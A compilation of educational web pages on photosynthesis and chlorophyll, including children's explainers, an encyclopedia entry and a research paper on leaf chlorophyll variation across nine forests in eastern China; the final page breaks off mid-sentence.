photosynthesis. Photosynthesis is the process by which plants make their own food. We will add more details to this definition after making a few things clear as you will see below. What is needed for Photosynthesis? To make food, plants need not just one but all of the following: • carbon dioxide • water • sunlight Let’s take a look at how these are collected by plants. • Carbon dioxide from the air passes through small pores (holes) in the leaves. These pores are called stomata. • Water is absorbed by the roots and passes through vessels in the stem on its way to the leaves. • Sunlight is absorbed by a green chemical in the leaves. What happens during Photosynthesis? The photosynthesis process takes place in the leaves of plants. The leaves are made up of very small cells. Inside these cells are tiny structures called chloroplasts. Each chloroplast contains a green chemical called chlorophyll which gives leaves their green color. • Chlorophyll absorbs the sun’s energy. • It is this energy that is used to split water molecules into hydrogen and oxygen. • Oxygen is released from the leaves into the atmosphere. • Hydrogen and carbon dioxide are used to form glucose or food for plants. Some of the glucose is used to provide energy for the growth and development of plants while the rest is stored in leaves, roots or fruits for later use by plants. Here is the process in greater detail: Photosynthesis occurs in two stages commonly known as Light dependent Reactions and the Calvin Cycle. Light dependent Reactions Light dependent reactions occur in the thylakoid membrane of the chloroplasts and take place only when light is available. During these reactions light energy is converted to chemical energy. • Chlorophyll and other pigments absorb energy from sunlight. This energy is transferred to the photosystems responsible for photosynthesis. • Water is used to provide electrons and hydrogen ions but also produces oxygen. Do you remember what happens to the oxygen? • The electrons and hydrogen ions are used to create ATP and NADPH. ATP is an energy storage molecule. NADPH is an electron carrier/donor molecule. Both ATP and NADPH will be used in the next stage of photosynthesis. Details about the flow of electrons through Photosystem II, b6-f complex, Photosystem I and NADP reductase have not been included here but can be found under The Process of Photosynthesis in Plants. The Calvin Cycle The Calvin Cycle reactions occur in the stroma of the chloroplasts. Although these reactions can take place without light, the process requires ATP and NADPH which were created using light in the first stage. Carbon dioxide and energy from ATP along with NADPH are used to form glucose. More details about the formation of sugars can be found under the Process of Photosynthesis in Plants. What have you learned so far? You already know that plants need carbon dioxide, water and sunlight to make their food. You also know that the food they make is called glucose. In addition to glucose, plants also produce oxygen. This information can be written in a word equation as shown below. The equation below is the same as the one above but it shows the chemical formula for carbon dioxide, water, glucose and oxygen. Now back to the definition… Earlier you learned that photosynthesis is the process by which plants make their own food. Now that we know what plants need to make food, we can add that information as shown below. Photosynthesis is the process by which plants make their own food using carbon dioxide, water and sunlight. What does Photosynthesis produce? Photosynthesis is important because it provides two main things: • food • oxygen Some of the glucose that plants produce during photosynthesis is stored in fruits and roots. This is why we are able to eat carrots, potatoes, apples, water melons and all the others. These foods provide energy for humans and animals. Oxygen that is produced during photosynthesis is released into the atmosphere. This oxygen is what we breathe and we cannot live without it. While it is important that photosynthesis provides food and oxygen, its impact on our daily lives is far more extensive. Photosynthesis is so essential to life on earth that most living organisms, including humans, cannot survive without it. All of our energy for growth, development and physical activity comes from eating food from plants and animals. Animals obtain energy from eating plants. Plants obtain energy from glucose made during photosynthesis. Our major sources of energy such as natural gas, coal and oil were made millions of years ago from the remains of dead plants and animals which we already know got their energy from photosynthesis. Photosynthesis is also responsible for balancing oxygen and carbon dioxide levels in the atmosphere. Plants absorb carbon dioxide from the air and release oxygen during the process of photosynthesis. Photosynthesis plants: photosynthesisThe location, importance, and mechanisms of photosynthesis.Encyclopædia Britannica, Inc.See all videos for this article Photosynthesis, the process by which green plants and certain other organisms transform light energy into chemical energy. During photosynthesis in green plants, light energy is captured and used to convert water, carbon dioxide, and minerals into oxygen and energy-rich organic compounds. Diagram of photosynthesis showing how water, light, and carbon dioxide are absorbed by a plant to produce oxygen, sugars, and more carbon dioxide.Encyclopædia Britannica, Inc. Top Questions Why is photosynthesis important? Photosynthesis is critical for the existence of the vast majority of life on Earth. It is the way in which virtually all energy in the biosphere becomes available to living things. As primary producers, photosynthetic organisms form the base of Earth’s food webs and are consumed directly or indirectly by all higher life-forms. Additionally, almost all the oxygen in the atmosphere is due to the process of photosynthesis. If photosynthesis ceased, there would soon be little food or other organic matter on Earth, most organisms would disappear, and Earth’s atmosphere would eventually become nearly devoid of gaseous oxygen. What is the basic formula for photosynthesis? The process of photosynthesis is commonly written as: 6CO2 + 6H2O → C6H12O6 + 6O2. This means that the reactants, six carbon dioxide molecules and six water molecules, are converted by light energy captured by chlorophyll (implied by the arrow) into a sugar molecule and six oxygen molecules, the products. The sugar is used by the organism, and the oxygen is released as a by-product. Read more below: General characteristics: Overall reaction of photosynthesis Which organisms can photosynthesize? The ability to photosynthesize is found in both eukaryotic and prokaryotic organisms. The most well-known examples are plants, as all but a very few parasitic or mycoheterotrophic species contain chlorophyll and produce their own food. Algae are the other dominant group of eukaryotic photosynthetic organisms. All algae, which include massive kelps and microscopic diatoms, are important primary producers. Cyanobacteria and certain sulfur bacteria are photosynthetic prokaryotes, in whom photosynthesis evolved. No animals are thought to be independently capable of photosynthesis, though the emerald green sea slug can temporarily incorporate algae chloroplasts in its body for food production. It would be impossible to overestimate the importance of photosynthesis in the maintenance of life on Earth. If photosynthesis ceased, there would soon be little food or other organic matter on Earth. Most organisms would disappear, and in time Earth’s atmosphere would become nearly devoid of gaseous oxygen. The only organisms able to exist under such conditions would be the chemosynthetic bacteria, which can utilize the chemical energy of certain inorganic compounds and thus are not dependent on the conversion of light energy. Energy produced by photosynthesis carried out by plants millions of years ago is responsible for the fossil fuels (i.e., coal, oil, and gas) that power industrial society. In past ages, green plants and small organisms that fed on plants increased faster than they were consumed, and their remains were deposited in Earth’s crust by sedimentation and other geological processes. There, protected from oxidation, these organic remains were slowly converted to fossil fuels. These fuels not only provide much of the energy used in factories, homes, and transportation but also serve as the raw material for plastics and other synthetic products. Unfortunately, modern civilization is using up in a few centuries the excess of photosynthetic production accumulated over millions of years. Consequently, the carbon dioxide that has been removed from the air to make carbohydrates in photosynthesis over millions of years is being returned at an incredibly rapid rate. The carbon dioxide concentration in Earth’s atmosphere is rising the fastest it ever has in Earth’s history, and this phenomenon is expected to have major implications on Earth’s climate. Requirements for food, materials, and energy in a world where human population is rapidly growing have created a need to increase both the amount of photosynthesis and the efficiency of converting photosynthetic output into products useful to people. One response to those needs—the so-called Green Revolution, begun in the mid-20th century—achieved enormous improvements in agricultural yield through the use of chemical fertilizers, pest and plant-disease control, plant breeding, and mechanized tilling, harvesting, and crop processing. This effort limited severe famines to a few areas of the world despite rapid population growth, but it did not eliminate widespread malnutrition. Moreover, beginning in the early 1990s, the rate at which yields of major crops increased began to decline. This was especially true for rice in Asia. Rising costs associated with sustaining high rates of agricultural production, which required ever-increasing inputs of fertilizers and pesticides and constant development of new plant varieties, also became problematic for farmers in many countries. Get exclusive access to content from our 1768 First Edition with your subscription. Subscribe today A second agricultural revolution, based on plant genetic engineering, was forecast to lead to increases in plant productivity and thereby partially alleviate malnutrition. Since the 1970s, molecular biologists have possessed the means to alter a plant’s genetic material (deoxyribonucleic acid, or DNA) with the aim of achieving improvements in disease and drought resistance, product yield and quality, frost hardiness, and other desirable properties. However, such traits are inherently complex, and the process of making changes to crop plants through genetic engineering has turned out to be more complicated than anticipated. In the future such genetic engineering may result in improvements in the process of photosynthesis, but by the first decades of the 21st century, it had yet to demonstrate that it could dramatically increase crop yields. Another intriguing area in the study of photosynthesis has been the discovery that certain animals are able to convert light energy into chemical energy. The emerald green sea slug (Elysia chlorotica), for example, acquires genes and chloroplasts from Vaucheria litorea, an alga it consumes, giving it a limited ability to produce chlorophyll. When enough chloroplasts are assimilated, the slug may forgo the ingestion of food. The pea aphid (Acyrthosiphon pisum) can harness light to manufacture the energy-rich compound adenosine triphosphate (ATP); this ability has been linked to the aphid’s manufacture of carotenoid pigments. What Is Photosynthesis: Chlorophyll And Photosynthesis For Kids What is chlorophyll and what is photosynthesis? Most of us already know the answers to these questions but for kids, this can be unchartered waters. To help kids gain a better understanding of the role of chlorophyll in photosynthesis in plants, keep reading. What is Photosynthesis? Plants, just like humans, require food in order to survive and grow. However, a plant’s food looks nothing like our food. Plants are the greatest consumer of solar energy, using power from the sun to mix up an energy rich meal. The process where plants make their own food is known as photosynthesis. Photosynthesis in plants is an extremely useful process whereby green plants take up carbon dioxide (a toxin) from the air and produce rich oxygen. Green plants are the only living thing on earth that are capable of converting the sun’s energy into food. Almost all living things are dependent upon the process of photosynthesis for life. Without plants, we would not have oxygen and the animals would have nothing to eat, and neither would we. What is Chlorophyll? The role of chlorophyll in photosynthesis is vital. Chlorophyll, which resides in the chloroplasts of plants, is the green pigment that is necessary in order for plants to convert carbon dioxide and water, using sunlight, into oxygen and glucose. During photosynthesis, chlorophyll captures the sun’s rays and creates sugary carbohydrates or energy, which allows the plant to grow. Understanding Chlorophyll and Photosynthesis for Kids Teaching children about the process of photosynthesis and the importance of chlorophyll is an integral part of most elementary and middle school science curriculums. Although the process is quite complex in its entirety, it can be simplified enough so that younger children can grasp the concept. Photosynthesis in plants can be compared with the digestive system in that they both break down vital elements to produce energy that is used for nourishment and growth. Some of this energy is used immediately, and some is stored for later use. Many younger children may have the misconception that plants take in food from their surroundings; therefore, teaching them the process of photosynthesis is vital to them grasping the fact that plants actually gather the raw ingredients necessary to make their own food. Photosynthesis Activity for Kids Hands-on activities are the best way to teach kids how the process of photosynthesis works. Demonstrate how the sun is necessary for photosynthesis by placing one bean sprout in a sunny location and one in a dark location. Both plants should be watered regularly. As students observe and compare the two plants over time, they will see the importance of sunlight. The bean plant in the sun will grow and thrive while the bean plant in the dark will become very sickly and brown. This activity will demonstrate that a plant cannot make its own food in the absence of sunlight. Have children sketch pictures of the two plants over several weeks and make notes regarding their observations. Factors Influencing Leaf Chlorophyll Content in Natural Forests at the Biome Scale Introduction Photosynthesis is the most important source of energy for plant growth (Mackinney, 1941; Baker, 2008), because chlorophyll (Chl) represents an important pigment for photosynthesis. The photosynthetic reaction is mainly divided into three steps: (1) primary reaction, (2) photosynthetic electron transport and photophosphorylation, and (3) carbon assimilation. Chlorophyll a (Chl a) and chlorophyll b (Chl b) are essential for the primary reaction. Chl a and Chl b absorb sunlight at different wavelengths (Chl a mainly absorbs red-orange light and Chl b mainly absorbs blue-purple light), leading to the assumption that the total amount leaf chlorophyll content (Chl a+b) and allocated ratio (Chl a/b) directly influence the photosynthetic capacity of plants. This assumption has been verified by a controlled experiment using several plant species (Croft et al., 2017). However, to date, it is unclear how leaf Chl content varies among plant species, plant functional groups (PFGs), and communities in natural forests, especially at a large scale. When considering on the importance of Chl for photosynthesis, plants in the natural community should optimize light absorption and photosynthesis by adjusting the content and ratios of Chl to enhance growth and survival at the long-term evolutionary scale. Certain factors might influence Chl levels. From the perspective of phylogeny, stable traits are the results of long-term adaption and evolution to the external environments. If Chl was a stable trait, the length of evolutionary history should have a constraining effect on it. In other words, Chl should be influenced by phylogeny. Some studies have demonstrated that phyletic evolution significantly influences certain leaf traits, such as element content and wood traits (He et al., 2010; Zhang et al., 2011; Liu et al., 2012; Zhao et al., 2014). If Chl is really influenced by phylogeny, the rule of Chl should be used only after excluding phylogenetic effects by using phylogenetically independent contrasts in future studies. Alternatively, plants inevitably adjust their own traits to adapt to different environments. Therefore, it is widely considered that plants should adjust Chl (Chl a, Chl b, Chl a+b, and Chl a/b) to adapt to a given environment and optimize photosynthesis. Thus, climate and soils should play important roles in regulating Chl, especially at a large scale. Chlorophyll synthesis requires many elements from soils; thus, soils should influence Chl (Fredeen et al., 1990). The synthesis of chlorophyll needs through a series of enzymatic reactions, with the temperatures that are too high or low inhibiting the enzyme reaction, even destroying the original chlorophyll. The optimum temperature of general plant chlorophyll synthesis is 30°C, DVR enzyme activity peaking at 30°C (Nagata et al., 2005). Thus, temperature also influences chlorophyll synthesis (Wolken et al., 1955). Precipitation might affect the photochemical activity of chloroplasts (Zhou, 2003), with water being the medium used for transporting nutrients in plants, as mineral salts must be dissolved in water to be absorbed by plants. Consequently, chlorophyll synthesis and water are closely related. The lack of water in leaves influences the synthesis of chlorophyll and promotes the decomposition of chlorophyll, and accelerating leaf yellowing. There is also indirect evidence that Chl is jointly controlled by climate and soils; thus, Chl might be an indicative trait for characterizing how plants respond to climate change. A major challenge is establishing how to link traits and functioning in natural ecosystems; yet, such knowledge is important to predict how ecosystem functioning varies with changing environments (Garnier and Navas, 2012; Reichstein et al., 2014). Because of the importance of Chl on photosynthesis, scientists assumed that a relationship between Chl and gross primary production (GPP) exists, using this relationship for model optimization. For instance, Croft et al. (2017) found that, for several plant species, it is better to use Chl as a proxy to replace photosynthetic efficiency, than the traditional substitute-leaf N content, when establishing models of GPP in forest communities. This approach was innovative and exciting for scientists involved in physiological ecology and macroecology. The reliability of leaf Chl content represents the maximum rate of carboxylation (Vmax), and has the potential for use as a proxy in models in the future (Croft et al., 2017). However, it is difficult to obtain data on Chl in natural communities, especially at a large scale. In this study, we investigated Chl across 823 plant species from nine forests, extending from tropical forests to cold-temperate forests in eastern China. Using these data, we explored variation in Chl, latitudinal patterns, and underlying influencing factors (climate, soil, and phylogeny). The main objectives of this study were to: (1) investigate how Chl varies in natural forests among different plant species, PFGs, and communities; (2) determine whether there is a latitudinal pattern in Chl; (3) identify the main factors influencing Chl (phylogeny, climate, and soil); and (4) provide large-scale evidence supporting the concept that Chl is a reliable proxy of Vmax in global ecological models. Materials and Methods Site Description The North-South Transect of Eastern China (NSTEC) is the fifteenth standard transect of the International Geosphere-Biosphere Program(IGBP), which is a unique forest belt mainly driven by thermal gradient and encompasses almost all forest types found in the northern hemisphere (Canadell et al., 2002). In this study, nine natural forests along the NSTEC were selected along the 4,200-km transect, including: Jiangfeng (JF), Dinghu (DH), Jiulian (JL), Shennong (SN), Taiyue (TY), Dongling (DL), Changbai (CB), Liangshui (LS), and Huzhong (HZ) (Figure S1). These nine forests span cold-temperate, temperate, subtropical, and tropical forests from 18.7 to 51.8°N. The mean annual temperature (MAT) of these forests ranges from −4.4 to 20.9°C, while mean annual precipitation (MAP) ranges from 481.6 to 2449.0 mm. Soils vary from tropical red soils with low organic matter to brown soils with high organic matter (Song et al., 2016). Detailed geographical information of the region is presented in Table S1. Field Sampling The field survey was conducted between July and August of 2013. First, four experimental plots (30 × 40 m) were selected in each forest. The geographical details, plant species composition, and community structure were determined for each plot. Trees were measured within the 30 × 40 m plots. Next, four quadrats (5 × 5 m) of shrubs and four plots (1 × 1 m) of herbs were setup at the four corners of each experimental plot. All common species were identified in each plot, including trees, shrubs, and herbs. Subsequently, we collected more than 30 pieces of leaves from each species, of which four pieces were randomly selected to cut up and determine chlorophyll content from each plant species within the plot. We chose mature and healthy trees, and collected fully expanded, sun-exposed leaves from four individuals of each plant species, which were considered as four repetitions (Zhao et al., 2016). Overall, the leaves of 823 plant species were collected. Soil samples (0–10 cm depth) were randomly collected from 30 to 50 points using a soil sampler (6-cm diameter) in each plot and were combined to form one composite sample in each plot (Tian et al., 2016; Wang et al., 2016; Li et al., 2018). Measurement of Leaf Chlorophyll Content Fresh leaves were cleaned to remove soil and other contaminants, and 0.1 g of fresh leaves was used to extract chlorophyll using 95% ethanol, with four replicates for each species of plants. The Chl content (Chl a and Chl b) of the filtered solution was measured using the classical spectrophotometric method with a spectrophotometer (Pharma Spec, UV-1700, Shimadzu, Japan) (Mackinney, 1941; Li et al., 2018). According to the Lambert-Beer law, the relationship between concentration and optical density is: D665=83.31 Ca+18.60 Cb (1) D649=4.54 Ca+44.24 Cb (2) G=Ca+Cb (3) where D665 and D649 are the optical densities of the chlorophyll solution at wavelengths 665 and 649 nm; Ca, Cb, and G are the concentrations of Chl a, Chl b, and total Chl, respectively (g L−1); 83.31 and 18.60 are the specific absorption of Chl a and Chl b at a wavelength of 665 nm; and 24.54 and 44.24 are the specific absorption of Chl a and Chl b at a wavelength of 649 nm. Chl a (mg g-1)=Ca×50/(1000×0.1) (4) Chl b (mg g-1)=Cb×50/(1000×0.1) (5) Then, Chl a+b and Chl a/b were calculated (mg g−1, leaf fresh mass, FM) as: Chl a+b (mg g-1)=G×50/(1000×0.1) (6) Chl a/b=Chl aChl b (7) Measurement of Soil Parameters Soil samples were acidified with HNO3 and HF overnight. Then, the samples were digested using a microwave digestion system (Mars X Press Microwave Digestion system, CEM, Matthews, NC, USA) before analyzing soil total phosphorus (STP) content. Elemental analyzer (Vario Analyzer, Elementar, Germany) was used to measure soil organic carbon (SOC) and soil total nitrogen (STN). Soil pH was determined using a pH meter (Mettler Toledo Delta 320, Switzerland) by using a slurry of soil and distilled water (1: 2.5) (Zhao et al., 2014). Climate Data The primary climate variables, including mean annual temperature (MAT) and mean annual precipitation (MAP), were extracted from the climate dataset at a 1 × 1 km spatial resolution. The data were collected at 740 climate stations of the China Meteorological Administration, from 1961 to 2007, using the interpolation software ANUSPLIN (He et al., 2014). Phylogeny Eight hundred and twenty-three species of plants were used to construct a phylogenetic tree at the species and family levels. First, we checked the species information in the Plant List (http://www.theplantlist.org/), and confirmed the correct Latin names of each species. Second, we defined a reference phylogenetic tree by using the “phytools” package in R and S. Phylo Maker (Qian and Jin, 2016), and generated the phylogenetic tree in the MAGA 5.1. Finally, using the algorithm BLADJ provided by the software Phylocom (Webb et al., 2008), according to molecular and fossil dating data (Wikström et al., 2001), we calculated the time of each node in the phylogenetic tree (in one million, m letters years, MY). At the family level, according to the evolution of angiosperm families provided by molecular and fossil dating data, we identified the evolution of angiosperm families. Statistical Analysis Plant species were divided by plant functional groups (PFGs, trees, shrubs, and herbs), growth forms (coniferous or broadleaved tree), and leaf types (evergreen or deciduous tree). One–way analysis of variance (ANOVA) with the post-hoc Duncan’s multiple comparison was used to test the differences in Chl for different sites, PFGs, and leaf types. We used regression analyses to explore latitudinal patterns of Chl. To analyze the factors influencing Chl, we calculated Spearman’s rank correlation coefficients for 823 plant species across sites, PFGs, and leaf types. We then used redundancy analysis (RDA) to analyze the relative influences of climate, soil, and the interspecific variation of species. The strength of the phylogenetic signal in Chl a, Chl b, Chl a+b, Chl a/b across plant species was quantified using Blomberg’s K statistics, which tests whether observed traits vary across a phylogeny (Blomberg et al., 2003). We tested the significance of this phylogenetic signal by comparing the actual system to a null model without phylogenetic structure. If the real value of the phylogenetic signal in the trait was greater than 95% that of the null model (P < 0.05), the phylogenetic signal was considered significant, and vice versa. The phylogenetic signal was quantified and tested using the “picante” package in R. Results FIGURE 1 Figure 1. Statistics of leaf chlorophyll content for the nine study forests along the North-South Transect of Eastern China (NSTEC). (A–D) were calculated in Chl a, Chl b, Chl a+b, Chl a/b, respectively. The black lines across the boxes are median values and red points represent the means. HZ, Huzhong; LS, Liangshui; CB, Changbai; DL, Dongling; TY, Taiyue; SN, Shennongjia; JL, Jiulian; DH, Dinghu; JF, Jianfengling. Numbers in brackets represent the number of sample species in the specific site. Same letters denote no significant difference among the nine sites (P < 0.05). TABLE 1 Table 1. Statistics of leaf chlorophyll content (mg g−1) for different life forms in forests. TABLE 2 Table 2. Statistics of leaf chlorophyll content (mg g−1) for different growth forms in forests. TABLE 3 Table 3. Statistics of leaf chlorophyll content (mg g−1) for different leaf shapes in forests. To quantify the variance of different groups (sites, life forms), interpretation ratios were calculated within groups and among groups. The variance of Chl a, Chl b, Chl a+b, and Chl a/b was mainly explained by within-site variation, with only a small portion arising from among-site variation (Figure 2A). Similar results were obtained for different plants with respect to life forms and leaf types (Figures 2B–D). Chl a, Chl b, and Chl a+b increased with increasing latitude; however, this trend was weak (all Ps < 0.01, R2 = 0.02) (Figures 3A–C). In comparison, there was not obvious latitudinal pattern on Chl a/b (Figure 3D). The contents of Chl a, Chl b, and Chl a+b in leaves were negatively correlated with MAT and MAP (all P’s < 0.01), and no significant relationships between Chl a/b and both MAT and MAP were observed (Figures S2, S3). FIGURE 2 Figure 2. Partitioning the total spatial variance of leaf chlorophyll content in the nine forests (A), different life forms (B), different growth forms (C), and different leaf shapes (D). FIGURE 3 Significant phylogenetic signals were observed for Chl a within life forms, communities, and across the whole transect, except for shrubs and conifer trees (Table 4). The K-values were approximately equal to 0. Significant phylogenetic signals were observed for Chl b within life forms and communities, and across the whole transect, except for shrubs and conifer trees. K-values were approximately equal to 0. There were no significant phylogenetic signals in Chl a/b (Table 4). Across different sites, there were no significant phylogenetic signals in Chl a+b at most sites (Table 5). Significant phylogenetic signals were observed for Chl a+b at some sites; however, all K-values were approximately equal to 0. In other words, the phylogenetic signals were too weak for Chl a, Chl b, Chl a+b, and Chl a/b (Figures S4, S5). TABLE 4 Table 4. Strength of the phylogenetic signal in chlorophyll traits for different growth forms. TABLE 5 Table 5. Strength of the phylogenetic signal in chlorophyll traits for each of the nine forests. Across all species, Chl a was negatively correlated with MAT and MAP (Ps < 0.01) and positively correlated with SOC, STN, and STP (Ps < 0.01). Chl b and Chl a+b were negatively correlated to MAT and MAP (Ps < 0.01), and positively correlated to SOC, STN, and STP. Chl a/b was negatively correlated to SOC and STP (Table S3). Environmental factors affected the Chl of PFGs and leaf types differently (Tables S4–S6). Environmental factors had weak influences on Chl a, Chl b, Chl a+b, and Chl a/b. Furthermore, more than 80% of the total variation of Chl a, Chl b, and Chl a+b could be explained by the interspecific variation in different life forms, forest communities, except for shrubs and conifer trees. For conifer trees, these Chl parameters explained 45% of variation. The contributions of climate and soil factors to the total variance of Chl along the transect were very low, less than 1% for all parameters (Table S7). Discussion Significant Differences in Chl Among Different Species, Life Forms, and Communities Large variation in Chl was observed among the 823-plant species in the natural forest communities. Across all plants, there were significant differences of Chl among different species, life forms, and communities. The coefficient of variations of Chl a, Chl b, Chl a+b, and Chl a/b were 0.41, 0.43, 0.41, and 0.14, respectively. The coefficient of variations of Chl a/b was relatively smaller than that of Chl a, Chl b, and Chl a+b. Although interspecific differences in Chl a and Chl b were very big, there should be a strong linear relationship between Chl a and Chl b (Li et al., 2018), lowering the variability of Chl a/b. Furthermore, the coefficients of variation of Chl a, Chl b, and Chl a+b were also large. Less than 10% of the total variation was among groups when all species were divided into diverse groups by sites, life forms, and leaf types. Especially for Chl a/b, total variation was close to zero. Interspecific variation might explain more than 80% of the total variations of Chl, which further confirms the presence of the larger interspecific variation of Chl. Weak Increasing Latitudinal Pattern of Chl in Natural Forests Although there were significant latitudinal patterns for Chl a, Chl b, and Chl a+b, the R2s were very weak. Chl a/b had no significant latitudinal pattern. The correlations between Chl contents and both MAT and MAP were weak. This phenomenon might be explained by a large amount of Chl in the forest communities being redundant, some of the plant chlorophyll is not involved in the photosynthetic reaction. Therefore, chlorophyll content is not necessarily linked to this reaction, even though temperature and water are the important factors in the synthesis of chlorophyll. Alternatively, high interspecific variation might have led to a weak latitudinal pattern in our study, with the highest coefficient of variation of Chl reaching 0.52. Yet, interspecific species variation could not be explained by environmental differences between the scale of the study and the observed weak latitudinal patterns. Furthermore, chlorophyll content might be affected by community structure, because the light shading effect on vertical structure might change Chl. Some control experiments found that shading effect might affect plant Chl content, and Chl a/b may also decrease. With the development of the molecular clock theory (molecular evolution speed constancy) and fossil dating data, researchers found that phylogenic history play a decisive role for some plant traits (Comas et al., 2014; Kong et al., 2014; Li et al., 2015). Some plant traits (i.e., N and P content and calorific values) are strongly affected by the phylogeny of plant species (Stock and Verboom, 2012; Chen et al., 2013; Song et al., 2016). In contrast, in our study, although Chl in the overall and different life forms had significant phylogenetic signals, the phylogenetic signal K values were close to zero. Theoretically, these traits were deemed as a strong phylogenetic signal if the K value > 1. Previous studies have demonstrated that if a plant trait has a significant phylogenetic signal, it could be considered as a conservative trait. Traits also perform more similarly when the genetic relationship of different species is closer (Felsenstein, 1985), and vice versa. Therefore, our results showed that Chl is almost not influenced by phylogeny in forests at a large scale. In theory, as an important photosynthetic pigment of plants, Chl is widely influenced by the environment. Unexpectedly, our results showed that both climate and soil factors had very small influences on Chl, while interspecific variation was the main factor influencing the spatial patterns of Chl from tropical to cold-temperate forests. Through the redundancy analysis, we found that climate and soil factors were not the main factors influencing Chl, because their independent effects were less than 1%. However, interspecific variation did explain more than 80% of Chl. Thus, our results support that plants adapt to the environment by adjusting Chl. Because of the small plasticity of Chl, the variability of Chl in single species had a certain threshold. Above this threshold, some plants would be replaced by others because of the environmental filter. This hypothesis requires to be verified in natural forests in future. Some studies have demonstrated that the variability of leaf traits is influenced by a combination of species, climate, and soil factors (Reich et al., 2007; Han et al., 2011; Liu et al., 2012). At a large scale, the patterns of leaf traits are not obvious along the changing environmental gradient, with greater variability occurring in species that coexist (Freschet et al., 2011; Onoda et al., 2011; Moles et al., 2014). Twenty-percent of spatial variation in leaf economic traits (specific leaf area, leaf longevity, photosynthetic rate, and leaf N and P content) is associated with the coexistence of different plant species (Wright et al., 2004; Freschet et al., 2011). Furthermore, previous control experiments showed that Chl is significantly associated with temperature and moisture (Yamane et al., 2000; Yin et al., 2006). However, the environmental factors used in this study were MAT and MAP, it would be an interesting idea to obtain the real-time data of chlorophyll and temperature and precipitation for future work. For the relationship between Chl and soil nutrients, we found that soils explain a small portion of total variation, because important elements are prioritized for important organs. As an important photosynthetic pigment, leaves should receive more nutrient elements for Chl, even if the low content of nutrient elements in soils has a small effect on Chl. Therefore, future research should focus on understanding how soils and the climate influence or optimize ecosystem functioning through a combination of element allocation. In addition, light is an important factor for chlorophyll synthesis, however in our analyzes light was not taken into account. To my knowledge, radiation could be measured using satellite data, and light extinction within forest canopies can be modeled. These would be potential next steps for our research. Chl Should be Cautiously Used as a Proxy for Simulating GPP in Natural Communities The main purpose of most studies on Chl in natural communities has been to establish a link between Chl and ecosystems functioning, because Chl is widely considered an important factor influencing leaf photosynthetic capacity (Singsaas et al., 2004). Using four deciduous tree species sampled across three growing seasons, Croft et al. (2017) showed that, compared with leaf N content, Chl serves as a better proxy for leaf photosynthetic capacity. Furthermore, Chl can be modeled accurately from remotely sensed data (Croft et al., 2013); thus, this important parameter has been used to model leaf photosynthetic capacity at the global scale (Jacquemoud and Baret, 1990). However, our results showed that significant differences in Chl occur among coexisting species, functional groups, and communities. Furthermore, the vertical structure of the plant community generated strong variation in the light environment, which might result in the accumulation of redundant Chl. In addition, our previous studies have also found that Chl showed a weak correlation with GPP in the communities (Li et al., 2018). Therefore, the photosynthetic capacity in a given natural forest community could be overestimated by using Chl. In other words, when using Chl as a proxy of GPP in the natural community, the outputs should be treated with caution. While it is a clever concept to optimize models using Chl data derived through remote sensing technology, more research is required to link Chl and GPP in the natural community in a way that is both representative and informative. Conclusions Significant variation in Chl was observed among different plant species, functional groups, and communities. Unexpectedly, Chl showed a very weak latitudinal pattern from tropical monsoon forests to cold-temperate coniferous forests, because of significant variation among coexisting species. This interspecific variation was the main factor affecting Chl, rather than soil and climate. Because of this “fuzzy regulation” of Chl in the natural community, caution should be taken when integrating Chl in ecological models. In conclusion, this approach should only being used if scientists are able to link Chl with ecosystem functioning in natural forest communities objectively in future studies. Authors Contributions NH and JH conceived the ideas and designed methodology; YL, LX, CL, JZ, QW, XZ, and XW collected the data; NH and YL analyzed the data; YL, NH, and JH led the writing of the manuscript. All authors contributed critically to the drafts and gave final approval for publication. Conflict of Interest Statement The authors declare that the research was conducted in the absence of any commercial or financial relationships that could be construed as a potential conflict of interest. Acknowledgments This work was supported by the National Key Research Project of China (2017YFC0504004, 2016YFC0500202), the National Natural Science Foundation of China (31000263, 611606015, 31290221), STS of Chinese Academy of Sciences (KFJ-SW-STS-167), and the program of Youth Innovation Research Team Project (LENOM2016Q0005). Supplementary Material PubMed Abstract | CrossRef Full Text | Google Scholar PubMed Abstract | CrossRef Full Text | Google Scholar CrossRef Full Text | Google Scholar CrossRef Full Text | Google Scholar PubMed Abstract | CrossRef Full Text | Google Scholar PubMed Abstract | CrossRef Full Text | Google Scholar CrossRef Full Text | Google Scholar Felsenstein, J. (1985). Phylogenies and the comparative method. Am. Nat. 125, 1–15. doi: 10.1086/284325 CrossRef Full Text | Google Scholar PubMed Abstract | CrossRef Full Text | Google Scholar CrossRef Full Text | Google Scholar CrossRef Full Text | Google Scholar PubMed Abstract | CrossRef Full Text | Google Scholar CrossRef Full Text | Google Scholar PubMed Abstract | CrossRef Full Text | Google Scholar CrossRef Full Text | Google Scholar PubMed Abstract | CrossRef Full Text | Google Scholar PubMed Abstract | CrossRef Full Text | Google Scholar CrossRef Full Text | Google Scholar CrossRef Full Text | Google Scholar Mackinney, G. (1941). Absorption of light by chlorophyll solutions. J. Biol. Chem. 140, 315–322. Google Scholar CrossRef Full Text | Google Scholar PubMed Abstract | CrossRef Full Text | Google Scholar PubMed Abstract | CrossRef Full Text | Google Scholar CrossRef Full Text | Google Scholar PubMed Abstract | CrossRef Full Text | Google Scholar PubMed Abstract | CrossRef Full Text | Google Scholar CrossRef Full Text | Google Scholar PubMed Abstract | CrossRef Full Text | Google Scholar CrossRef Full Text | Google Scholar PubMed Abstract | CrossRef Full Text | Google Scholar CrossRef Full Text | Google Scholar PubMed Abstract | CrossRef Full Text | Google Scholar PubMed Abstract | CrossRef Full Text | Google Scholar Google Scholar PubMed Abstract | CrossRef Full Text | Google Scholar PubMed Abstract | CrossRef Full Text | Google Scholar CrossRef Full Text | Google Scholar CrossRef Full Text | Google Scholar PubMed Abstract | CrossRef Full Text | Google Scholar CrossRef Full Text | Google Scholar CrossRef Full Text | Google Scholar Making Food What is photosynthesis? Photosynthesis is the process by which plants make food from light, water, nutrients, and carbon dioxide. What is chlorophyll? Chlorophyll is the green pigment, or color, found in plants that helps the plant make food. Plants are very important to us. All food people eat comes directly or indirectly from plants. Directly from plants: Indirectly from plants: For example, apples come from an apple tree. The flour used to make bread comes from a wheat plant. Steak comes from a cow, and we all know that cows are animals, not plants, right? But what does the cow eat? It eats grass and grains—PLANTS! So all the foods we eat come from plants. But what do plants eat? They make their own food! What Do Plants Need to Make Food? Plants need several things to make their own food. They need: • chlorophyll, a green pigment found in the leaves of plants (see the layer of chlorophyll in the cross-section of a leaf below) • light (either natural sunlight or artificial light, like from a light bulb) • carbon dioxide (CO2)(a gas found in the air; one of the gases people and animals breathe out when they exhale) • water (which the plant collects through its roots) • nutrients and minerals (which the plant collects from the soil through its roots) Plants make food in their leaves. The leaves contain a 